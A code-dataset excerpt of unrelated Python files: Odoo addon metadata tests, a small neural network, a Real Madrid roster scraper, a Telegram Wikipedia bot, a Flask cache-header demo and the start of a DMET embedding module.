_m(tmp_path, version=\"14.0.1.0.0\", depends=[\"base\"])[\"requires_dist\"] == [\n \"odoo>=14.0a,<14.1dev\",\n ]\n\n\n@pytest.mark.parametrize(\n (\"odoo_series\", \"depends\", \"expected\"),\n [\n (\"8.0\", [\"mis_builder\"], [\"odoo8-addon-mis_builder\"]),\n (\"9.0\", [\"mis_builder\"], [\"odoo9-addon-mis_builder\"]),\n (\"10.0\", [\"mis_builder\"], [\"odoo10-addon-mis_builder\"]),\n (\"11.0\", [\"mis_builder\"], [\"odoo11-addon-mis_builder\"]),\n (\"12.0\", [\"mis_builder\"], [\"odoo12-addon-mis_builder\"]),\n (\"13.0\", [\"mis_builder\"], [\"odoo13-addon-mis_builder\"]),\n (\"14.0\", [\"mis_builder\"], [\"odoo14-addon-mis_builder\"]),\n (\"15.0\", [\"mis_builder\"], [\"odoo-addon-mis_builder>=15.0dev,<15.1dev\"]),\n (\"16.0\", [\"mis_builder\"], [\"odoo-addon-mis_builder>=16.0dev,<16.1dev\"]),\n (\n \"14.0\",\n [\n \"mis_builder\",\n \"mis_builder_budget\",\n ],\n [\n \"odoo14-addon-mis_builder\",\n \"odoo14-addon-mis_builder_budget\",\n ],\n ),\n (\n \"16.0\",\n [\n \"base\",\n \"mis_builder\",\n \"mis_builder_budget\",\n ],\n [\n \"odoo-addon-mis_builder>=16.0dev,<16.1dev\",\n \"odoo-addon-mis_builder_budget>=16.0dev,<16.1dev\",\n ],\n ),\n ],\n)\ndef test_depends_noncore_addon(\n tmp_path: Path,\n odoo_series: str,\n depends: List[str],\n expected: List[str],\n) -> None:\n \"\"\"A dependency on a non-core addon appears in requires_dist.\"\"\"\n requires_dist = _m(tmp_path, version=f\"{odoo_series}.1.0.0\", depends=depends)[\n \"requires_dist\"\n ]\n assert [d for d in requires_dist if not d.startswith(\"odoo>=\")] == expected\n\n\ndef test_depends_override(tmp_path: Path) -> None:\n \"\"\"A dependency on a non-core addon appears in requires_dist.\"\"\"\n assert _m(\n tmp_path,\n depends=[\"mis_builder\"],\n depends_override={\"mis_builder\": \"odoo14-addon-mis_builder>=14.0.4.0.0\"},\n )[\"requires_dist\"] == [\n \"odoo14-addon-mis_builder>=14.0.4.0.0\",\n \"odoo>=14.0a,<14.1dev\",\n ]\n\n\ndef test_external_dependencies(tmp_path: Path) -> None:\n assert _m(tmp_path, external_dependencies={\"python\": [\"lxml\"]})[\n \"requires_dist\"\n ] == [\n \"lxml\",\n \"odoo>=14.0a,<14.1dev\",\n ]\n\n\ndef test_external_dependencies_only(tmp_path: Path) -> None:\n assert _m(\n tmp_path,\n depends=[\"mis_builder\"],\n external_dependencies={\"python\": [\"lxml\"]},\n external_dependencies_only=True,\n )[\"requires_dist\"] == [\n \"lxml\",\n ]\n\n\ndef test_external_dependencies_override(tmp_path: Path) -> None:\n assert _m(\n tmp_path,\n external_dependencies={\"python\": [\"lxml\"]},\n external_dependencies_override={\"python\": {\"lxml\": \"lxml>=3.8.0\"}},\n )[\"requires_dist\"] == [\n \"lxml>=3.8.0\",\n \"odoo>=14.0a,<14.1dev\",\n ]\n\n\ndef test_external_dependencies_override_multi(tmp_path: Path) -> None:\n assert _m(\n tmp_path,\n external_dependencies={\"python\": [\"lxml\"]},\n external_dependencies_override={\n \"python\": {\"lxml\": [\"lxml>=3.8.0\", \"something\"]},\n },\n )[\"requires_dist\"] == [\"lxml>=3.8.0\", \"odoo>=14.0a,<14.1dev\", \"something\"]\n\n\ndef test_odoo_series_unsupported(tmp_path: Path) -> None:\n with pytest.raises(UnsupportedOdooSeries):\n _m(tmp_path, version=\"45.0.1.0.0\")\n\n\n@pytest.mark.parametrize(\"version\", [\"1\", \"1.0\", \"1.0.0\", \"1.0.0.0\", \"10.0.0.0\"])\ndef test_manifest_version_undetermined(tmp_path: Path, version: str) -> None:\n with pytest.raises(UnsupportedManifestVersion):\n _m(tmp_path, version=version)\n\n\ndef test_odoo_version_override(tmp_path: Path) -> None:\n assert _m(tmp_path, version=\"45.0.1.0.0\", odoo_version_override=\"14.0\")[\n \"requires_dist\"\n ] == [\"odoo>=14.0a,<14.1dev\"]\n\n\ndef test_odoo_series_override(tmp_path: Path) -> None:\n assert _m(tmp_path, version=\"45.0.1.0.0\", odoo_series_override=\"14.0\")[\n \"requires_dist\"\n ] == [\"odoo>=14.0a,<14.1dev\"]\n\n\ndef test_summary_defaults_to_name(tmp_path: Path) -> None:\n assert _m(tmp_path, name=\"addon1\")[\"summary\"] == \"addon1\"\n\n\ndef test_summary_from_summary(tmp_path: Path) -> None:\n assert _m(tmp_path, name=\"addon1\", summary=\"Addon 1\")[\"summary\"] == \"Addon 1\"\n\n\ndef test_description(\n tmp_path: Path,\n description: str = \"A description\\n\\nwith two lines\",\n) -> None:\n assert _m(tmp_path, description=description)[\"description\"] == description\n\n\ndef test_description_from_readme(\n tmp_path: Path,\n readme_rst: str = \"A readme\\n\\nwith two lines\",\n) -> None:\n assert _m(tmp_path, readme_rst=readme_rst)[\"description\"] == readme_rst\n\n\ndef test_description_from_description_and_readme(\n tmp_path: Path,\n description: str = \"A description\",\n readme_rst: str = \"A readme\\n\\nwith two lines\",\n) -> None:\n assert (\n _m(tmp_path, description=description, readme_rst=readme_rst)[\"description\"]\n == readme_rst\n )\n\n\ndef test_author(tmp_path: Path) -> None:\n assert _m(tmp_path, author=\"John Doe\")[\"author\"] == \"John Doe\"\n\n\ndef test_author_no_nl(tmp_path: Path) -> None:\n assert _m(tmp_path, author=\"John Doe,\\nOCA\")[\"author\"] == \"John Doe, OCA\"\n\n\ndef test_author_email_oca(tmp_path: Path) -> None:\n assert \"author_email\" not in _m(\n tmp_path,\n addon_dir_name=\"a\",\n author=\"John Doe\",\n )\n assert (\n _m(\n tmp_path,\n addon_dir_name=\"b\",\n author=\"John Doe, Odoo Community Association (OCA)\",\n )[\"author_email\"]\n == \"support@odoo-community.org\"\n )\n\n\n@pytest.mark.parametrize(\n \"odoo_series\",\n [\"8.0\", \"9.0\", \"10.0\", \"11.0\", \"12.0\", \"13.0\", \"14.0\", \"15.0\", \"16.0\"],\n)\ndef test_classifiers(tmp_path: Path, odoo_series: str) -> None:\n assert _m(tmp_path, version=f\"{odoo_series}.1.0.0\")[\"classifier\"] == [\n \"Programming Language :: Python\",\n \"Framework :: Odoo\",\n f\"Framework :: Odoo :: {odoo_series}\",\n ]\n\n\n@pytest.mark.parametrize(\n (\"license\", \"expected_license\"),\n [\n (\n \"agpl-3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n ),\n (\n \"AGPL-3\",\n \"License :: OSI Approved :: GNU Affero General Public License v3\",\n ),\n (\n \"agpl-3 or any later version\",\n \"License :: OSI Approved :: \"\n \"GNU Affero General Public License v3 or later (AGPLv3+)\",\n ),\n (\n \"gpl-2\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n ),\n (\n \"gpl-2 or any later version\",\n \"License :: OSI Approved :: \"\n \"GNU General Public License v2 or later (GPLv2+)\",\n ),\n (\n \"gpl-3\",\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n ),\n (\n \"gpl-3 or any later version\",\n \"License :: OSI Approved :: \"\n \"GNU General Public License v3 or later (GPLv3+)\",\n ),\n (\n \"lgpl-2\",\n \"License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)\",\n ),\n (\n \"lgpl-2 or any later version\",\n \"License :: OSI Approved :: \"\n \"GNU Lesser General Public License v2 or later (LGPLv2+)\",\n ),\n (\n \"lgpl-3\",\n \"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)\",\n ),\n (\n \"lgpl-3 or any later version\",\n \"License :: OSI Approved :: \"\n \"GNU Lesser General Public License v3 or later (LGPLv3+)\",\n ),\n ],\n)\ndef test_classifiers_license(\n tmp_path: Path,\n license: str, # shadowing Python builtin\n expected_license: str,\n) -> None:\n assert expected_license in _m(tmp_path, license=license)[\"classifier\"]\n\n\n@pytest.mark.parametrize(\n (\"development_status\", \"expected_development_status\"),\n [\n (\"alpha\", \"Development Status :: 3 - Alpha\"),\n (\"beta\", \"Development Status :: 4 - Beta\"),\n (\"production/stable\", \"Development Status :: 5 - Production/Stable\"),\n (\"stable\", \"Development Status :: 5 - Production/Stable\"),\n (\"production\", \"Development Status :: 5 - Production/Stable\"),\n (\"mature\", \"Development Status :: 6 - Mature\"),\n ],\n)\ndef test_classifiers_development_status(\n tmp_path: Path,\n development_status: str,\n expected_development_status: str,\n) -> None:\n assert (\n expected_development_status\n in _m(tmp_path, development_status=development_status)[\"classifier\"]\n )\n\n\ndef test_license(tmp_path: Path, license: str = \"AGPL-3\") -> None:\n assert _m(tmp_path, license=license)[\"license\"] == license\n\n\ndef test_home_page(tmp_path: Path, website: str = \"https://acsone.eu\") -> None:\n assert _m(tmp_path, website=website)[\"home_page\"] == website\n\n\ndef test_precomputed_metadata_path(tmp_path: Path) -> None:\n pkg_info_path = tmp_path / \"PKG-INFO\"\n pkg_info_path.write_text(\"Name: odoo14-addon-addon1\\nVersion: 14.0.1.0.0.3\")\n metadata = _m(\n tmp_path,\n addon_dir_name=\"tmp\",\n version=\"14.0.1.0.0\",\n precomputed_metadata_file=pkg_info_path,\n )\n assert metadata[\"name\"] == \"odoo14-addon-addon1\"\n assert metadata[\"version\"] == \"14.0.1.0.0.3\"\n\n\ndef _make_git_addon(\n tmp_path: Path,\n manifest_version: str,\n post_commits: int = 0,\n addon_name: str = \"addon1\",\n) -> Path:\n addon_dir = tmp_path / addon_name\n addon_dir.mkdir()\n addon_dir.joinpath(\"__manifest__.py\").write_text(\n f\"{{'name': '{addon_name}', 'version': '{manifest_version}'}}\",\n )\n addon_dir.joinpath(\"__init__.py\").touch()\n subprocess.check_call([\"git\", \"init\"], cwd=addon_dir)\n subprocess.check_call(\n [\"git\", \"config\", \"user.email\", \"test@example.com\"],\n cwd=addon_dir,\n )\n subprocess.check_call([\"git\", \"config\", \"user.name\", \"test\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"add\", \".\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"initial commit\"], cwd=addon_dir)\n for i in range(post_commits):\n addon_dir.joinpath(\"README.rst\").write_text(f\"{i}\")\n subprocess.check_call([\"git\", \"add\", \"README.rst\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", f\"commit {i}\"], cwd=addon_dir)\n return addon_dir\n\n\n@pytest.mark.parametrize(\n (\n \"manifest_version\",\n \"post_commits\",\n \"post_version_strategy_override\",\n \"expected_version\",\n ),\n [\n # last commit is manifest version change\n (\"8.0.1.0.0\", 0, None, \"8.0.1.0.0\"),\n (\"9.0.1.0.0\", 0, None, \"9.0.1.0.0\"),\n (\"10.0.1.0.0\", 0, None, \"10.0.1.0.0\"),\n (\"11.0.1.0.0\", 0, None, \"11.0.1.0.0\"),\n (\"12.0.1.0.0\", 0, None, \"12.0.1.0.0\"),\n (\"13.0.1.0.0\", 0, None, \"13.0.1.0.0\"),\n (\"14.0.1.0.0\", 0, None, \"14.0.1.0.0\"),\n (\"15.0.1.0.0\", 0, None, \"15.0.1.0.0\"),\n (\"16.0.1.0.0\", 0, None, \"16.0.1.0.0\"),\n # 2 commits after manifest version change\n (\"8.0.1.0.0\", 2, None, \"8.0.1.0.0.99.dev2\"),\n (\"9.0.1.0.0\", 2, None, \"9.0.1.0.0.99.dev2\"),\n (\"10.0.1.0.0\", 2, None, \"10.0.1.0.0.99.dev2\"),\n (\"11.0.1.0.0\", 2, None, \"11.0.1.0.0.99.dev2\"),\n (\"12.0.1.0.0\", 2, None, \"12.0.1.0.0.99.dev2\"),\n (\"13.0.1.0.0\", 2, None, \"13.0.1.0.1.dev2\"),\n (\"14.0.1.0.0\", 2, None, \"14.0.1.0.1.dev2\"),\n (\"15.0.1.0.0\", 2, None, \"15.0.1.0.0.2\"),\n (\"16.0.1.0.0\", 2, None, \"16.0.1.0.0.2\"),\n # strategy overrides\n (\"16.0.1.0.0\", 2, POST_VERSION_STRATEGY_NONE, \"16.0.1.0.0\"),\n (\"16.0.1.0.0\", 2, POST_VERSION_STRATEGY_NINETYNINE_DEVN, \"16.0.1.0.0.99.dev2\"),\n (\"16.0.1.0.0\", 2, POST_VERSION_STRATEGY_P1_DEVN, \"16.0.1.0.1.dev2\"),\n (\"16.0.1.0.0\", 2, POST_VERSION_STRATEGY_DOT_N, \"16.0.1.0.0.2\"),\n ],\n)\ndef test_git_post_version(\n tmp_path: Path,\n manifest_version: str,\n post_commits: int,\n post_version_strategy_override: Optional[str],\n expected_version: str,\n) -> None:\n addon_dir = _make_git_addon(\n tmp_path,\n manifest_version=manifest_version,\n post_commits=post_commits,\n )\n metadata = msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\"post_version_strategy_override\": post_version_strategy_override},\n ),\n )\n assert metadata[\"version\"] == expected_version\n\n\n@pytest.mark.parametrize(\n (\n \"manifest_version\",\n \"post_commits\",\n \"post_version_strategy_override\",\n \"expected_version\",\n ),\n [\n (\"16.0.1.0.0\", 1, POST_VERSION_STRATEGY_NONE, \"16.0.1.0.0\"),\n (\"16.0.1.0.0\", 1, POST_VERSION_STRATEGY_NINETYNINE_DEVN, \"16.0.1.0.0.99.dev2\"),\n (\"16.0.1.0.0\", 1, POST_VERSION_STRATEGY_P1_DEVN, \"16.0.1.0.1.dev2\"),\n (\"16.0.1.0.0\", 1, POST_VERSION_STRATEGY_DOT_N, \"16.0.1.0.0.2\"),\n ],\n)\ndef test_git_post_version_uncommitted_change(\n tmp_path: Path,\n manifest_version: str,\n post_commits: int,\n post_version_strategy_override: str,\n expected_version: str,\n) -> None:\n addon_dir = _make_git_addon(\n tmp_path,\n manifest_version=manifest_version,\n post_commits=post_commits,\n )\n addon_dir.joinpath(\"README.rst\").write_text(\"stuff\")\n metadata = msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\"post_version_strategy_override\": post_version_strategy_override},\n ),\n )\n assert metadata[\"version\"] == expected_version\n\n\n@pytest.mark.parametrize(\n \"post_version_strategy_override\",\n [\n POST_VERSION_STRATEGY_NONE,\n POST_VERSION_STRATEGY_NINETYNINE_DEVN,\n POST_VERSION_STRATEGY_P1_DEVN,\n POST_VERSION_STRATEGY_DOT_N,\n ],\n)\ndef test_git_post_version_bad_manifest_in_history(\n tmp_path: Path,\n post_version_strategy_override: str,\n) -> None:\n addon_dir = _make_git_addon(tmp_path, manifest_version=\"16.0.1.1.0\")\n addon_dir.joinpath(\"__manifest__.py\").write_text(\n \"{syntaxerror, 'version': '16.0.1.2.0'}\",\n )\n subprocess.check_call([\"git\", \"add\", \"__manifest__.py\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"bad manifest\"], cwd=addon_dir)\n addon_dir.joinpath(\"__manifest__.py\").write_text(\n \"{'name': 'A', 'version': '16.0.1.3.0'}\",\n )\n subprocess.check_call([\"git\", \"add\", \"__manifest__.py\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"good manifest\"], cwd=addon_dir)\n metadata = msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\"post_version_strategy_override\": post_version_strategy_override},\n ),\n )\n assert metadata[\"version\"] == \"16.0.1.3.0\"\n\n\n@pytest.mark.parametrize(\n \"post_version_strategy_override\",\n [\n POST_VERSION_STRATEGY_NONE,\n POST_VERSION_STRATEGY_NINETYNINE_DEVN,\n POST_VERSION_STRATEGY_P1_DEVN,\n POST_VERSION_STRATEGY_DOT_N,\n ],\n)\ndef test_git_post_version_good_manifest_in_history(\n tmp_path: Path,\n post_version_strategy_override: str,\n) -> None:\n addon_dir = _make_git_addon(tmp_path, manifest_version=\"16.0.1.1.0\")\n addon_dir.joinpath(\"__manifest__.py\").write_text(\n \"{'name': 'A', 'version': '16.0.1.2.0'}\",\n )\n subprocess.check_call([\"git\", \"add\", \"__manifest__.py\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"good manifest\"], cwd=addon_dir)\n metadata = msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\"post_version_strategy_override\": post_version_strategy_override},\n ),\n )\n assert metadata[\"version\"] == \"16.0.1.2.0\"\n\n\n@pytest.mark.parametrize(\n \"post_version_strategy_override\",\n [\n POST_VERSION_STRATEGY_NONE,\n POST_VERSION_STRATEGY_NINETYNINE_DEVN,\n POST_VERSION_STRATEGY_P1_DEVN,\n POST_VERSION_STRATEGY_DOT_N,\n ],\n)\ndef test_git_post_version_no_manifest_in_history(\n tmp_path: Path,\n post_version_strategy_override: str,\n) -> None:\n addon_dir = _make_git_addon(tmp_path, manifest_version=\"16.0.1.1.0\")\n subprocess.check_call([\"git\", \"rm\", \"__manifest__.py\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"no manifest\"], cwd=addon_dir)\n addon_dir.joinpath(\"__manifest__.py\").write_text(\n \"{'name': 'A', 'version': '16.0.1.2.0'}\",\n )\n subprocess.check_call([\"git\", \"add\", \"__manifest__.py\"], cwd=addon_dir)\n subprocess.check_call([\"git\", \"commit\", \"-m\", \"good manifest\"], cwd=addon_dir)\n metadata = msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\"post_version_strategy_override\": post_version_strategy_override},\n ),\n )\n assert metadata[\"version\"] == \"16.0.1.2.0\"\n\n\n@pytest.mark.parametrize(\n (\"dependencies\", \"expected\"),\n [\n (\n [\n \"lxml\",\n \"wrapt\",\n \"odoo8-addon-toto\",\n \"odoo12-addon-connector\",\n \"odoo\",\n \"odoo>=16\",\n \"odoo-addon-mis_builder\",\n \"odoorpc\",\n ],\n [\"lxml\", \"wrapt\", \"odoorpc\"],\n ),\n ],\n)\ndef test_filter_odoo_addon_dependencies(\n dependencies: List[str],\n expected: List[str],\n) -> None:\n assert list(_filter_odoo_addon_dependencies(dependencies)) == expected\n\n\ndef test_distribution_name_to_addon_name() -> None:\n assert distribution_name_to_addon_name(\"odoo14-addon-addon1\") == \"addon1\"\n assert distribution_name_to_addon_name(\"odoo-addon-addon1\") == \"addon1\"\n assert distribution_name_to_addon_name(\"odoo-addon-addon-1\") == \"addon_1\"\n assert distribution_name_to_addon_name(\"odoo-addon-addon_1\") == \"addon_1\"\n with pytest.raises(InvalidDistributionName):\n distribution_name_to_addon_name(\"odoo14-addon-\")\n with pytest.raises(InvalidDistributionName):\n distribution_name_to_addon_name(\"addon1\")\n\n\ndef test_addon_name_to_distribution_name() -> None:\n assert (\n addon_name_to_distribution_name(\"addon1\", OdooSeries.v14_0)\n == \"odoo14-addon-addon1\"\n )\n assert (\n addon_name_to_distribution_name(\"addon_1\", OdooSeries.v16_0)\n == \"odoo-addon-addon_1\"\n )\n\n\ndef test_addon_name_to_requirement() -> None:\n assert (\n addon_name_to_requirement(\"addon1\", OdooSeries.v14_0) == \"odoo14-addon-addon1\"\n )\n assert (\n addon_name_to_requirement(\"addon1\", OdooSeries.v16_0)\n == \"odoo-addon-addon1>=16.0dev,<16.1dev\"\n )\n\n\ndef test_get_author_email() -> None:\n assert (\n _author_email(\"Odoo Community Association (OCA)\")\n == \"support@odoo-community.org\"\n )\n assert (\n _author_email(\"Odoo Community Association (OCA), ACSONE SA/NV\")\n == \"support@odoo-community.org\"\n )\n assert _author_email(\"ACSONE SA/NV\") is None\n\n\n@pytest.mark.parametrize(\n (\"s\", \"expected\"),\n [\n (\"\", \"\"),\n (None, None),\n (\" \", \"\"),\n (\" \\n \", \"\"),\n (\"a\", \"a\"),\n (\" a\\nb\\n\", \"a b\"),\n ],\n)\ndef test_no_nl(s: Optional[str], expected: Optional[str]) -> None:\n assert _no_nl(s) == expected\n","repo_name":"acsone/manifestoo-core","sub_path":"tests/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":24990,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"31"} +{"seq_id":"38408148770","text":"#!/usr/bin/python2 \nimport math\nimport copy\nimport random as r\nfrom misc import *\n#from bigfloat import *\n\n#functions for the neural network including update, backprogation\n#sigmoid, etc.\n\ndef sigmoid(value):\n\t#print \"sigmoid: \", value\n\treturn 1 / (1 + math.exp(- value))\n\ndef dsigmoid(value):\n\treturn math.exp(- value) / ((math.exp(- value) + 1) * (math.exp(- value) + 1)) \n\n#update the network, w contains the weights\n#v is a ragged array of values for each layer (including input)\ndef update(w,v):\n\t#prev = copy.deepcopy(v)\n\tn = len(v)\n\tfor i in range(1,n): #each layer\n\t\tfor j in range(len(v[i])): #node in each layer\n\t\t\tsum = 0\n\t\t\tfor k in range(len(w[i][j])):\n\t\t\t\tfor l in range(len(w[i][j][k])):\n\t\t\t\t\t#print \"Update I: \", i,\"J: \", j, \"K: \", k,\"L: \",l\n\t\t\t\t\tsum += sigmoid(v[k][l])*w[i][j][k][l]\n\t\t\t#print v\n\t\t\tv[i][j] = sum\n\t\t\t\n\n#finds the mean squared error of the output for a given pattern\ndef error(output,desired):\n\terror = 0\n\tn = len(output)\n\tfor i in range(n):\n\t\terror += ((desired[i] - sigmoid(output[i])) * (desired[i] - sigmoid(output[i])))\n\treturn error\n\n#parameters are lists\ndef backpropagate(v,desired,w,gradient):\n\tfor i in range(len(v[2])):\n\t\tgradient[2][i] = (desired[i] - sigmoid(v[2][i]))*dsigmoid(v[2][i])\n\tfor i in range(len(v[1])):\n\t\tsum = 0\n\t\tfor j in range(len(v[2])):\n\t\t\tsum += gradient[2][j]*w[2][j][1][i]*dsigmoid(v[1][i])\n\t\tgradient[1][i] = sum\n\t\t\n\ndef compute_delta(delta,gradient,output,a,topology):\n\tnumLayers = len(topology)\n\tfor i in range(1,numLayers):\n\t\tfor j in range(topology[i]):\n\t\t\tfor k in range(i):\n\t\t\t\tfor l in range(topology[k]):\n\t\t\t\t\t#print \"I: \", i,\"J: \", j, \"K: \", k,\"L: \",l\n\t\t\t\t\tdelta[i][j][k][l] = delta[i][j][k][l]*a + ((1 - a) * gradient[i][j] * sigmoid(output[k][l]))\n\ndef update_weight(delta,weights,eta,topology):\n\tnumLayers = len(topology)\n\tfor i in range(1,numLayers):\n\t\tfor j in range(topology[i]):\n\t\t\tfor k in range(i):\n\t\t\t\tfor l in range(topology[k]):\n\t\t\t\t\t#delta[i][j][k][l] = delta[i][j][k][l]*a + ((1 - a) * gradient[i][j] * output[i][k])\n\t\t\t\t\tweights[i][j][k][l] += delta[i][j][k][l]*eta\n\n#allocate all the lists to be used in here,\n#topology is a vector \ndef allocate_lists(topology,v,weights,delta,gradient):\n\tnumLayers = len(topology)\n\tfor i in range(numLayers):\n\t\tnodesInLayer = topology[i]\n\t\tnew = []\n\t\tv.append(copy.deepcopy(new))\n\t\tgradient.append(copy.deepcopy(new))\n\t\tfor j in range(nodesInLayer):\n\t\t\tv[i].append(0)\n\t\t\tgradient[i].append(0)\n\tdelta.append(copy.deepcopy(new))\n\tweights.append(copy.deepcopy(new))\n\tfor i in range(1,numLayers):\n\t\t#print \"i: \",i\n\t\tdelta.append(copy.deepcopy(new))\n\t\tweights.append(copy.deepcopy(new))\n\t\tfor j in range(topology[i]):\n\t\t\t#print \"J: \", j\n\t\t\tdelta[i].append(copy.deepcopy(new))\n\t\t\tweights[i].append(copy.deepcopy(new))\n\t\t\tfor k in range(i):\n\t\t\t\t#print \"I: \", i,\"J: \", j, \"K: \", k\n\t\t\t\tdelta[i][j].append(copy.deepcopy(new))\n\t\t\t\tweights[i][j].append(copy.deepcopy(new))\n\t\t\t\tfor l in range(topology[k]):\n\t\t\t\t\t#print \"I: \", i,\"J: \", j, \"K: \", k,\"L: \",l\n\t\t\t\t\tdelta[i][j][k].append(0)\n\t\t\t\t\tweights[i][j][k].append(0)\t\n\t\t\t\t\n\ndef initialize_weights(weights,topology):\n\tnumLayers = len(topology)\n\tfor i in range(1,numLayers):\n\t\tfor j in range(topology[i]):\n\t\t\tfor k in range(i):\n\t\t\t\tfor l in range(topology[k]):\n\t\t\t\t\tnum = r.random() * .3\n\t\t\t\t\tsign = r.random()\n\t\t\t\t\tif(sign < .5):\n\t\t\t\t\t\tnum *= -1\n\t\t\t\t\tweights[i][j][k][l] = num\n\t\t\t\t\t#weights[i][j][k][l] = BigFloat(num,context=precision(100))\n\t\n\n","repo_name":"segfault802/nettalk","sub_path":"ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"38895143847","text":"#jugadores del madrid y sus posiciones\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nr = requests.get(\"https://www.realmadrid.com/futbol/plantilla\")\r\nsoup = BeautifulSoup(r.text, \"html.parser\")\r\nlistOfNames = []\r\nlistOfPositions = []\r\nresults = soup.find(\"div\", {\"class\":\"section wide\"})\r\nnames = results.findAll(\"span\",{\"itemprop\":\"name\"})\r\npositions = results.findAll(\"span\",{\"itemprop\":\"jobTitle\"})\r\nfor item in names:\r\n players_name = item.find(\"strong\").text\r\n listOfNames.append(players_name)\r\nfor items in positions:\r\n players_positions = items.text\r\n listOfPositions.append(players_positions)\r\nfor i in range (len(listOfNames)):\r\n print(listOfNames[i], \" \", listOfPositions[i])\r\n","repo_name":"xanasa14/WebScrapery","sub_path":"imagery.py","file_name":"imagery.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10137480787","text":"from requests_html import HTMLSession\nfrom telegram import ParseMode\n\n\n_help_='''\nUse to find definition of some terms.\n\n*commands:*\n- /define :find definition of .\n'''\n\nsession = HTMLSession()\n\ndef define(update,context):\n try:\n args = '_'.join(context.args)\n if len(args) == 0:\n raise IndexError\n\n source = session.get('https://simple.wikipedia.org/wiki/' + args)\n\n if source.ok:\n definition = source.html.find('mw-content-text, p', first =True).text\n\n else:\n definition = 'Nothing feasible found.'\n\n update.message.reply_text(definition)\n\n except IndexError:\n update.message.reply_text('*Usage:* /define ',\n parse_mode=ParseMode.MARKDOWN)\n","repo_name":"laraib07/TelegramBot","sub_path":"modules/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21751469709","text":"from flask import Flask, Response\nfrom flask import request\nfrom flask_cachecontrol import (\n FlaskCacheControl,\n cache,\n cache_for,\n dont_cache\n)\n\nflask_cache_control = FlaskCacheControl()\n\n\napp = Flask(__name__)\nflask_cache_control.init_app(app)\n\n\n@app.route('/')\n@cache_for(seconds=10)\ndef index():\n return 'index'\n\n\n@app.route('/expires')\ndef expires():\n return 'expires'\n\n\n@app.route('/cache-control/public')\n# @cache(max_age=10, public=True)\ndef public():\n response = Response('public')\n response.headers['Cache-Control'] = 'max-age=10,public'\n return response\n\n\n@app.route('/cache-control/private')\n# @cache(max_age=10, private=True)\ndef private():\n response = Response('private')\n response.headers['Cache-Control'] = 'max-age=10,private'\n return response\n\n\n@app.route('/cache-control/max-age')\n# @cache_for(seconds=10)\ndef max_age():\n max_age = request.args.get('max-age', 10)\n response = Response('max-age')\n # response.headers['Cache-Control'] = 'max-age=10'\n response.cache_control.max_age = max_age\n return response\n\n\n@app.route('/cache-control/min-fresh')\n# @cache(min_fresh=10)\ndef min_fresh():\n response = Response('min-fresh')\n response.headers['Cache-Control'] = 'min-fresh=10'\n # response.cache_control.min_fresh = 10\n return response\n\n\n@app.route('/cache-control/no-cache')\ndef no_cache():\n response = Response('no-cache')\n # response.headers['Cache-Control'] = 'no-cache'\n response.cache_control = 'no-cache'\n return response\n\n\n@app.route('/cache-control/no-store')\ndef no_store():\n response = Response('no-store')\n # response.headers['Cache-Control'] = 'no-store'\n response.cache_control = 'no-store'\n return response\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"AngelLiang/flask-browser-cache-learning","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37275672306","text":"import dataclasses\nfrom timeit import default_timer as timer\n\nimport numpy as np\nimport scipy\n\nfrom vayesta.core.qemb import Embedding\nfrom vayesta.core.util import break_into_lines, time_string\nfrom vayesta.dmet.fragment import DMETFragment, DMETFragmentExit\n\nfrom vayesta.dmet.sdp_sc import perform_SDP_fit\nfrom vayesta.dmet.updates import MixUpdate, DIISUpdate\n\n\n@dataclasses.dataclass\nclass Options(Embedding.Options):\n \"\"\"Options for DMET calculations.\"\"\"\n\n iao_minao: str = \"auto\" # Minimal basis for IAOs\n dm_with_frozen: bool = False # Add frozen parts to cluster DMs\n # -- Self-consistency\n maxiter: int = 30\n charge_consistent: bool = True\n max_elec_err: float = 1e-4\n conv_tol: float = 1e-6\n diis: bool = True\n mixing_param: float = 0.5\n mixing_variable: str = \"hl rdm\"\n oneshot: bool = False\n # --- Solver options\n solver_options: dict = Embedding.Options.change_dict_defaults(\n \"solver_options\",\n # CCSD\n solve_lambda=True,\n )\n\n\n@dataclasses.dataclass\nclass DMETResults:\n cluster_sizes: np.ndarray = None\n e_corr: float = None\n\n\nclass DMET(Embedding):\n Fragment = DMETFragment\n Options = Options\n\n def __init__(self, mf, solver=\"CCSD\", log=None, **kwargs):\n t_start = timer()\n # If we're running in oneshot mode will only do a single iteration, regardless of this setting, but good to have\n # consistent settings.\n if kwargs.get(\"oneshot\", False):\n kwargs[\"maxiter\"] = 1\n\n super().__init__(mf, solver=solver, log=log, **kwargs)\n\n self.log.info(\"Parameters of %s:\", self.__class__.__name__)\n self.log.info(break_into_lines(str(self.opts), 